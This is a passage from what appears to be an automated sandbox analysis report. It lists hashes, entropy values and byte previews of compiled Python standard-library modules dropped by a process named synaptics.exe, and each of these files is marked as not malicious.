                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z m!Z!..z.d.d.l.m"Z"..W.n...e#yi......Y.n.w.d.d.l.m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-..d.d.l.m.Z.m/Z/..e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e2j3..Z4e2_4d.d...e2j5.6..D...Z7e8e2d.d...Z9G.d.d...d.e...Z:G.d d!..d!e...Z;G.d"d#..d#e...Z<G.d$d%..d%e...Z=e.j>d&k...r.d.d'l.m?Z?m@Z@..d.d(lAmAZAmBZBmCZC..d.d)lAmDZDmEZEmFZF..d.d.lAZGd.d.lHZHd.d.lIZId.d.lJZJeKZLd*g.ZMeNe.d+..ZOe.ZPe.ZQd,d-..ZRd.d/..ZSd0d1..ZTd2d3..ZUe.d4d5..ZVd6d7..ZWG.d8d9..d9e.d9d:....ZXG.d;d<..d<eXe...ZYG.d=d>..d>e...ZZeYj[f.d.d.d.d?..d@dA..Z\d[e]dBeYj[d.d.d.d.d.dC..dDdE..Z^e\Z_e^Z`G.dFdG..dG..ZadHdI..ZbG.dJdK..dKeA..ZceceZ_deaeZ_ed.d.dBe]e3d.dLdLd.f.dMdN..ZfdOdP..ZgdQZhdRZidSdT..ZjdUdV..Zkeld.eFf.dWdX..ZmdYdZ..Znd.S.)\
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4283
                                                                                                                                                                                                                Entropy (8bit):5.539617439246459
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:Jn/f+60wN3EXHu/aowjk0wBoCAEFXOrW6QBeABPl:JeRy3EuBwjk0w+CFXefQBT
                                                                                                                                                                                                                MD5:FECC28546ECFA99521EC73116D4C82E6
                                                                                                                                                                                                                SHA1:F57A9E5F62CC98A2B9578A616576F87EFCB64AB7
                                                                                                                                                                                                                SHA-256:7DC03EFD9B3CA6963EC15D77FEE0E1EE38D78E7B667B123BDBC29545BE437A72
                                                                                                                                                                                                                SHA-512:570793A7AB671F1096A4AA63C586F9E9BBBBCEAF031766D003A84FBD5D386969A9D850306E6879EBBD5252A160740B1A0D6FEC0FAB5A5DDD6DB8E81D14EE5575
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d0........................@...sJ...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z d*Z!d+Z"e"Z#d,Z$d-Z%d.Z&d/Z'd0Z(d-Z)d.Z*d/Z+d1Z,d2Z-d3Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6d.Z7d3Z8d2Z9d.Z:d4Z;d5Z<d6Z=d7Z>d8Z?e.d9f.e.d:f.e.d;f.e.d<f.e.d=f.e.d>f.e.d?f.f.e)d@f.f.e*dAf.f.e+e!B.d:f.e!dBf.e+dCf.f.e-d@f.f.e.dAf.f.e/e"B.d:f.e"dBf.e/dCf.f.e1d@f.f.e2dAf.f.e3e$B.dDf.e$dEf.e3dCf.f.f.Z@dFdG..ZAd2ZBd*ZCd/ZDd3ZEd.ZFd.ZGd.ZHd.ZId.ZJd5ZKd.ZLd.ZMd+ZNd,ZOd.ZPd-ZQd4ZRz.d.dHlST.W.dIS...eT..y$......Y.dIS.w.)JzoConstants/functions for interpreting results of os.stat() and os.lstat()...Suggested usage: from stat import *...................................................c....................C........|.d.@.S.).zMReturn the portion of the file's mode that can be set by. os.chmod().. i..........moder....r.....%C:\Users\user\Desktop\tmp\lib\stat.py..S_IMODE...........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):7112
                                                                                                                                                                                                                Entropy (8bit):5.386566110982794
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:jLetNTT8nglJcsGpTeWD3EDNmO2vja68/2s4li6lu:2bTT8nKvGpT/O2vja68/x4limu
                                                                                                                                                                                                                MD5:901532B9A4180D9AFE6EB0A7337DE64F
                                                                                                                                                                                                                SHA1:FF77340F718A103676EFAB19AA9E4F1CA1E9B1F2
                                                                                                                                                                                                                SHA-256:0A47879E757F7688229E067698333D5DF07D2FADF2660CE135F464AEE8CECF85
                                                                                                                                                                                                                SHA-512:4B93C5676807E3361C8B9E61B3C52EC33A4FB7904C07F4E56AC7CE166E28C2FA47ED126DEDEBC1FF4FF651B819B07E9DDCEA9A4C890E31B37B777B0A7CA9A384
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d^*.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.e.e...Z.d.Z.e.d...d...Z.d.Z.d.Z.e.e...e...e...Z.d.d.d...Z.d.d.l.Z.d.d.l.m.Z...i.Z.G.d.d...d...Z.e.......G.d.d...d...Z.d.S.).an...A collection of string constants...Public module variables:..whitespace -- a string containing all ASCII whitespace.ascii_lowercase -- a string containing all ASCII lowercase letters.ascii_uppercase -- a string containing all ASCII uppercase letters.ascii_letters -- a string containing all ASCII letters.digits -- a string containing all ASCII decimal digits.hexdigits -- a string containing all ASCII hexadecimal digits.octdigits -- a string containing all ASCII octal digits.punctuation -- a string containing all ASCII punctuation characters.printable -- a string containing all ASCII characters considered printable..)...ascii_letters..ascii_lowercase..ascii_uppercase..capwords..digits..hexdigits..octdigits..printable..punctuation..whitespace..Formatter..Template.....Nz. .....Z.abcdefg
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17085
                                                                                                                                                                                                                Entropy (8bit):5.692305260978468
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:vORubSi/2orlLsqOf9dzA3gfqtv+ScNDMepN9WDnuxb3rOyb5:vOkbSi+orD29JlqtvtcNoepN9Wzra
                                                                                                                                                                                                                MD5:0A992A490DE21283B2FDC8755DA9A746
                                                                                                                                                                                                                SHA1:1503F20A722518993351DBBF2F51F1E08860E94C
                                                                                                                                                                                                                SHA-256:520AC4344735AF54A7CDAFCBB9FF39C72B0E638840C3770F894188BA1F3EE1CB
                                                                                                                                                                                                                SHA-512:381C584AC28B70C5B31573EE26CCE9BF4BD722A341D0D73566C7D57832DD56BEAD3B0E3BA3A5425EFAED846491B9A3ABD1997D1ED12636172AC83471FCD559ED
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.3.......................@...s....d.Z.d.d.l.m.Z...e.j.d.k.s.J...d.d...Z.e.g.d...e.e.d.d.........Z.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..d+d,..i.d-d...d/d0..d1d2..d3d ..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI..dJdK..dLdM....i.dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\dM..d]dO..d^dQ..d_dS..d`dU..dadW..dbdY..dcd[..ddde..dfdg....i.dhdi..djdk..dldm..dndo..dpdq..drds..dtde..dudg..dvdi..dwdk..dxdm..dydo..dzdq..d{ds..d|d}..d~d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d}..d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):317
                                                                                                                                                                                                                Entropy (8bit):5.004309073595233
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:y/0kFextfvXhzYXcCuYKvg6FraMaVkoopngmIVZAuGuFMW/Zkn:Cqxt35YXcaKvjFrDaVkoek+0R/Zkn
                                                                                                                                                                                                                MD5:77A0D9ED36A87E36D88CCBA5978CA258
                                                                                                                                                                                                                SHA1:8F4FA582EEA688A7A2B2F9C00B5613CA37A15B9E
                                                                                                                                                                                                                SHA-256:11916769D9FC8B8196442B959BEF4F15E50CB50C7C4E586EC19A52FB1510BFE0
                                                                                                                                                                                                                SHA-512:59EFDCC5C7F39822738A6F456D4F883B7011AC51CF22C9A77E845A5EB8481E21D2196A95276B5432DD1F60B7214EA5B7F5FC45C1F17E9E5E9017E24483CAF218
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s,...g.d...Z.d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.).).Z.calcsize..packZ.pack_into..unpackZ.unpack_fromZ.iter_unpack..Struct..error.....)...*)..._clearcache)...__doc__N)...__all__Z._structr....r......r....r.....'C:\Users\user\Desktop\tmp\lib\struct.py..<module>....s............
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):24074
                                                                                                                                                                                                                Entropy (8bit):5.281865163751495
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:YGeOIQ/N1bmiY+HWkXkONXPVlMyNwfUC9Nrz/Stjtb7hLBx3/Tds5Vp:HeT81bminY0XPVmyNwM8NPqJ7Zb7ds5T
                                                                                                                                                                                                                MD5:526AAADA9AB8E695360707CDF542A57F
                                                                                                                                                                                                                SHA1:8CB8823FD9020DE44303F4BF198C4D8364B383EC
                                                                                                                                                                                                                SHA-256:C60C0CF6FDE90C10688308B1F42444405D1E162E193239DF7AE236A29B5B7C0D
                                                                                                                                                                                                                SHA-512:B5AE5B96F8BE3D368C8BBA198E392CB04A9959FB1E56B6514FB803F06D9BE5364B18156C8FFBBB4E367AAFF90CA1398804658F3DB24FF921A1FFB558AC484B76
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dku.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.Z.e.j.e.j.B.e.j.B.Z.e.e.d...rJe.e.j.O.Z.e.Z e.e.d...rVe e.j!O.Z e.e.d...r_e.j"Z"n.d.Z"d.Z#e...Z$d.d...Z%d.d...Z&d.d...Z'G.d.d...d...Z(d.d...Z)d.d...Z*d.a+d.d...Z,d.d...Z-d.d...Z.d.d...Z/d.a0d.d...Z1d d!..Z2d"d#..Z3d?d%d&..Z4d@d'd(..Z5d)e#d.f.d*d+..Z6G.d,d-..d-..Z7G.d.d/..d/..Z8.....2dAd.d3..d4d5..Z9e.j:d6k.s.e.j;d7k.r.e9Z<n.e.e.d8..a=......dBd.d3..d9d:..Z<G.d;d<..d<..Z>G.d=d>..d>..Z?d.S.)Ca....Temporary files...This module provides generic, low- and high-level interfaces for.creating temporary files and directories. All of the interfaces.provided by this module can be used without fear of race conditions.except for 'mktemp'. 'mktemp' is subject to race conditions and.should not be used; it is provided for backward compatibility only...The default path names are returned as str. If you supply bytes as.input, all return values will b
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):13822
                                                                                                                                                                                                                Entropy (8bit):5.3382593142335235
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:GB47d3TOzzlFEYKRuPSzqjNGmwImkWf8FBQ:GB47deF/5JNG5MkkBQ
                                                                                                                                                                                                                MD5:C761D7E3B34ECCACCF7A7F6D9337EA6C
                                                                                                                                                                                                                SHA1:B36C96BFC9252C9754DD8D9756AC0E8B28AB0F4F
                                                                                                                                                                                                                SHA-256:866C4E983F366182F067A09E8FA98744666BEB69FC6BAE591B193E3EF9C71D7C
                                                                                                                                                                                                                SHA-512:3B6171E92C138C9E9A25D86B1A3ABDB341DC43FAA7085664123738E715EA1EF73D3F51D4A0E72EA8A63BB77533174CBD667095E2046D1D48B4F5BA6D0855F491
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d*O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.e...d.e.j...Z.e...d.e.j...Z.d.d...Z.d.d.d...Z.e.d.k.rDe.e.d.......d.S.d.S.).z.Text wrapping and filling.......N)...TextWrapper..wrap..fill..dedent..indent..shortenz...... c....................@...s....e.Z.d.Z.d.Z.i.Z.e.d...Z.e.D.].Z.e.e.e.e...<.q.d.Z.d.Z.d.e...e.....Z.d.e.d.d.......Z.e...d.e.e.e.e.d.....e.j...Z.[.[.[.e...d.e.....Z.[.e...d...Z.....................d&d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d.S.)'r....a..... Object for wrapping/filling text. The public interface consists of. the wrap() and fill() methods; the other methods are just there for. subclasses to override in order to tweak the default behaviour.. If you want to completely replace the main wrapping algorithm,. you'll probably have to override _wrap_chunks()... Several instance attributes control various aspects of wrapping:. width (default:
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):44979
                                                                                                                                                                                                                Entropy (8bit):5.172062783983674
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:R1N/MIxOwAgbSGxwbNNo+rkPsXj16a1Zmi8Y2S41QrTrWOnO89x+6Lc/QpZ2efn0:Rj/8Zf2lbPs/v612aOJ/46PeaBATiI/z
                                                                                                                                                                                                                MD5:62CD3C50DF22083AF7EF5AC7AF699E5F
                                                                                                                                                                                                                SHA1:FF347DB26731A25A050A9A7A7FC7226805EEB92D
                                                                                                                                                                                                                SHA-256:3CE601F4C854F9E79BF5EEB444000C29777ED5B8207907627BD950B38ACDB9FC
                                                                                                                                                                                                                SHA-512:3F04278482D56DCA9FECB798087BB1DEB0338CAE89B4AA91E35A81089B20225B3320239F1FEDC8BA98F4191D3AE080D01611C908537D2A12DECACEC56F7B5172
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s6...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...z.d.d.l.m.Z...W.n...e.y=......d.d.l.m.Z...Y.n.w.g.d...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.z.e.j.Z.d.Z.e...d.....W.n...e ye......d.Z.Y.n.w.e.j!Z"z.e.j#Z$W.n...e yy......d.Z$Y.n.w.e.j%Z%[.d.a&d.a'd.d...Z(d.d...Z)d.d...Z*d.d...Z+e.Z,d.d...Z#G.d.d...d...Z-e-Z.G.d.d...d...Z/G.d.d...d...Z0G.d.d...d.e0..Z1G.d.d...d...Z2G.d.d ..d ..Z3G.d!d"..d"e4..Z5e.d#..j6Z7d$d%..Z8e#..a9i.Z:i.Z;e...Z<e...a=e>..a?d&d'..Z@G.d(d)..d)..ZAz.d.d*l.mBaCmDZE..W.n#..e...y.......d.d+lFmGZH..d.d,l.mIZI..eId-d...ZDd/d-..ZEd0d1..aCY.n.w.tCZJd2d3..ZKG.d4d5..d5eA..ZLG.d6d7..d7eA..ZMG.d8d9..d9eA..ZNd:d;..ZOd<d=..ZPd>d?..ZQd@dA..ZRdBdC..ZSdDdE..ZTg.ZUd.aVdFdG..ZWd.dHl.mXZX..eM..aYdIdJ..ZZdKdL..Z[z.d.dMl.m\Z]..W.n...e...y.......d.dNl^m]Z]..Y.n.w.dOdP..Z_e`e.dQ....r.e.jae_dR....d.S.d.S.)Sz;Thread module emulating a subset of Java's threading model......N)...monotonic)...WeakSet)...islice..count)...deque)...get_ident
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2748
                                                                                                                                                                                                                Entropy (8bit):5.77254890558528
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:+HWS58lFEOqIlPBJR41WBzH3ch9C7Q7WnvKQvVgkGQLU:+HWSOFEOb5n1Bb3ch9T6qKLU
                                                                                                                                                                                                                MD5:B8D9D78B5D9347F1BBECC57038C5BED7
                                                                                                                                                                                                                SHA1:6C968AAF8D97DFDA5E7EC77C0147A605900B9AD2
                                                                                                                                                                                                                SHA-256:8FA512615E3B9C43C8CE54A7AE2B38C73FF862E30D7258B3C0B10E3C4299715E
                                                                                                                                                                                                                SHA-512:BBC7CA9122A85ABC6627690BD64565E1185FCF2DB4648EA18F99C67FB74B0D2A948E49191EAA8A168B6AE03E5A36244CC66CFA9D0979CAC35C12178FB9625E47
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sF...d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCZCdDdE..eD...E..D...ZFe..GeF.H......i.dFe...dGe...dHe*..dIe...dJe+..dKe...dLe...dMe...dNe%..dOe0..dPe(..dQe...dRe&..dSe...dTe...dUe'..dVe5..i.dWe...dXe6..dYe...dZe1..d[e2..d\e)..d]e...d^e7..d_e...d`e...dae#..dbe...dce...dde...dee...dfe...dge ....e$e/e3e4e.e.e"e-e.e.e,e.e!dh....ZIdidj..ZJdkdl..ZKdmdn..ZLdoS.)pz.Token constants.)...tok_name..ISTERMINAL..ISNONTERMINAL..ISEOF................................................................................................................................................................. ....!...."....#....$....%....&....'....(....)....*....+....,....-........./....0....1....2....3....4....5....6....7....8....9....:....;....<....
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17204
                                                                                                                                                                                                                Entropy (8bit):5.77666597107552
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:1SAswuiDIbAPaiOkoc/w3CJg+YRn9JMHfHE7BFli:1mimAPajkoc/wyJg+Y/s87BFli
                                                                                                                                                                                                                MD5:11FC14009A3001DEE0F0A604A9126AB8
                                                                                                                                                                                                                SHA1:4DDB56824E2A25789E6CAABB9922DF3C36855325
                                                                                                                                                                                                                SHA-256:81C2A7EED73A21F6E6A6ED58FDB7820797628CBBC742BE109C15C4A18FC8EE30
                                                                                                                                                                                                                SHA-512:99B8185A58224ABE2AF8CBFBA453D4354E527A5729CF938EB063971DDE915CC69A011DE3212208203CA9349B77B02A47970136FA3141CC1DCD8CB7F57E6FA732
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.g.......................@...sT...d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z...e...d.e.j...Z.e...d.e.j...Z.d.d.l.Z.e.j.g.d.....Z.[.G.d.d...d.e...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.e.e.d.e.......e.e.....Z.d.Z d.Z!d.Z"d.Z#d.Z$e.e!e"e#e$..Z%d.Z&e.d.d ..e.e&....Z'd!e&..Z(e.e'e(..Z)e.d"e)d#....Z*e.e*e)e%..Z+d$d%..Z,e.j-d&d'....Z.e.e,....Z/d(Z0d)Z1d*Z2d+Z3e.e/d,..e/d-....Z4e.e/d...e/d/....Z5e.e6e.j7e8e.d0d1......Z9e.d2e9..Z:e.e+e:e5e ..Z;e.e;..Z<e.e/d3..e.d4d.....e/d5..e.d6d.......Z=e.d7e.e4..Z>e.e.e>e+e:e=e ....Z?i.Z@e,..D.].ZAe0e@eAd4..<.e1e@eAd6..<.e2e@eAd,..<.e3e@eAd-..<...q.eB..ZCeB..ZDe,..D.]%ZEeEd6..eEd4..f.D.].ZFeC.GeF......qIeEd-..eEd,..f.D.].ZFeD.GeF......qZ..q?d8ZHG.d9d:..d:eI..ZJG.d;d<..d<eI..ZKG.d=d>..d>..ZLd?d@..ZMdAdB..ZNdCdD..ZOdEdF..Z.dGdH..ZPdIdJ..ZQdKdL..ZRdMdN..ZSeTdOk...r.eS....d.S.d.S.)Pao...Tokenization help for Python programs...tokenize(readline) is a generator that breaks a stream
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):21718
                                                                                                                                                                                                                Entropy (8bit):5.294671461425223
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:MooNGsSgHvgJJpLbiO+pSbnwRG+SbL3JWFsFmpbQigBsGUa2l4cCKJJBq:MookcHvIJpiJAngz4BNUpl4cCkJBq
                                                                                                                                                                                                                MD5:0FA240C93F923E4519847B466CB9E923
                                                                                                                                                                                                                SHA1:CB70E1ECB07ECD6D5BA85E0782AD76F60820A27C
                                                                                                                                                                                                                SHA-256:75234828F03823786CE546C52692EABAC7AB604C575CFA256AA89C9079228B1F
                                                                                                                                                                                                                SHA-512:E4B2C3BDDA7D06012F2DB9D5EADB8EA83A6CED6DA9D8D2A2BC79D8F438A01C6DC599B607002E68A15B9CE370D638097E65C393AD5CE8997DB91871374018C427
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.i.......................@...sJ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d8d.d...Z.d.d...Z.d9d.d...Z.d8d.d...Z.d8d.d...Z.d.Z.d.Z.G.d.d...d...Z.e...Z.d.d...Z.e.e.d.d.d.f.d.d...Z.e.e.d.d.f.d.d...Z.e.f.d.d...Z.d.d...Z.d.d...Z.d:d.d ..Z.d;d!d"..Z.d:d#d$..Z.d<d%d&..Z.d9d'd(..Z.d9d)d*..Z.d+d,..Z.G.d-d...d...Z.d/d0..Z.d1d2..Z.d3Z.G.d4d5..d5e ..Z!G.d6d7..d7..Z"d.S.)=z@Extract, format and print information about Python stack traces......N)...extract_stack..extract_tb..format_exception..format_exception_only..format_list..format_stack..format_tb..print_exc..format_exc..print_exception..print_last..print_stack..print_tb..clear_frames..FrameSummary..StackSummary..TracebackException..walk_stack..walk_tbc....................C...s4...|.d.u.r.t.j.}.t...|.......D.].}.t.|.|.d.d.....q.d.S.).zyPrint the list of tuples as returned by extract_tb() or. extract_stack() as a formatted stack trace to the given file.N......file..end)...sys..stderrr......from_list..format..print)...extracted_l
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9535
                                                                                                                                                                                                                Entropy (8bit):5.143373111420471
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:68BGSXkI30fX7ad5RV7VIPNmXkXFNlO8U2UuLWnxq3juXvypQ1SwDFBL0GSSSOSD:vBGgfioV4NmAFyvWLwx8pOXU/l4r/sV
                                                                                                                                                                                                                MD5:F0F70A91E733670A9CD32D34E2576B44
                                                                                                                                                                                                                SHA1:96407AEF7FF4D61D24D2A4299F4AD2CE5D37D8A5
                                                                                                                                                                                                                SHA-256:8C704DA1334F92A09AEE8FE19D3E926A42E4206048481A0F9107C457EA4F367E
                                                                                                                                                                                                                SHA-512:8EB6D76E3A6639D1FDC4671D61E05320A00C74775F6727CFC2BF5C5EDF23B61F66948AFD98801D8A6588D98A96773E7BE2782D4ADBD2EFAFF64398E62BEEE026
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.(.......................@...s....d.Z.d.d.l.Z.d.d...Z.e.e...Z.e.d.d.....Z.e.e.j...Z.e.e.j...Z.e.e.j...Z.d.d...Z.e.e.....Z.d.d...Z.e.e.....Z.d.d...Z.e...Z.e.e...Z.e.......d.d...Z.e...Z.e.e...Z.G.d.d...d...Z.e.e...j...Z.e.e...Z.e.g.j...Z.e.e.j...Z.e.e...j...Z e.e!j"..Z#e.e$j.d.....Z%e.e...Z&z.e'....e'y.......e..(..d...Z)e.e)..Z*e.e)j+..Z,d.Z)[)Y.n.w.e.e.j...Z-e.e.j...Z/[.[.[.[.[.[.d$d.d...Z0d.d...Z1d%d.d...Z2d.d...Z3G.d.d...d...Z4G.d.d...d...Z5d d!..Z6e.e7e8....Z9e.e8e!B...Z:e.e;..Z<e.d...Z=e.e>..Z?d"d#..e@..D...ZAd.S.)&zO.Define names for built-in types that aren't directly accessible as a builtin.......Nc....................C........d.S...N..r....r....r.....&C:\Users\user\Desktop\tmp\lib\types.py.._f...........r....c....................C...r....r....r....r....r....r....r......<lambda>....r....r....c........................s....d.....f.d.d...}.|.j.d...S.).N.....c........................r....r....r....r........ar....r......f....r....z._cell_factory.<locals>.fr....)...__closur
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):85287
                                                                                                                                                                                                                Entropy (8bit):5.27575073490137
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:DCZtWnoBkc6T6G9TSgukYqUwmM6eOZtTKNtB21bvSF3hCmp9NrT51mWbAyfthIR3:+gR2k3kUNtg1UQmpfb18oc3
                                                                                                                                                                                                                MD5:CBD7F28A11DAB4FEC9E1C09B09BDEF88
                                                                                                                                                                                                                SHA1:050201D3D3EE3F15D4EB53BD6555CF51A8E5CD56
                                                                                                                                                                                                                SHA-256:D627229F1C269B4613090F1E4D8AFE95949858107F6760F9CC8E4AFD5A418761
                                                                                                                                                                                                                SHA-512:13E3373CA56E1A03BB036A04FE55DADF4240DCD96D9C34EC93A8297AE091617591A43A6F4E6AF7EA5718FC742C8782C1B8C7546818F481E03C513285AE5B8251
                                                                                                                                                                                                                Malicious:false
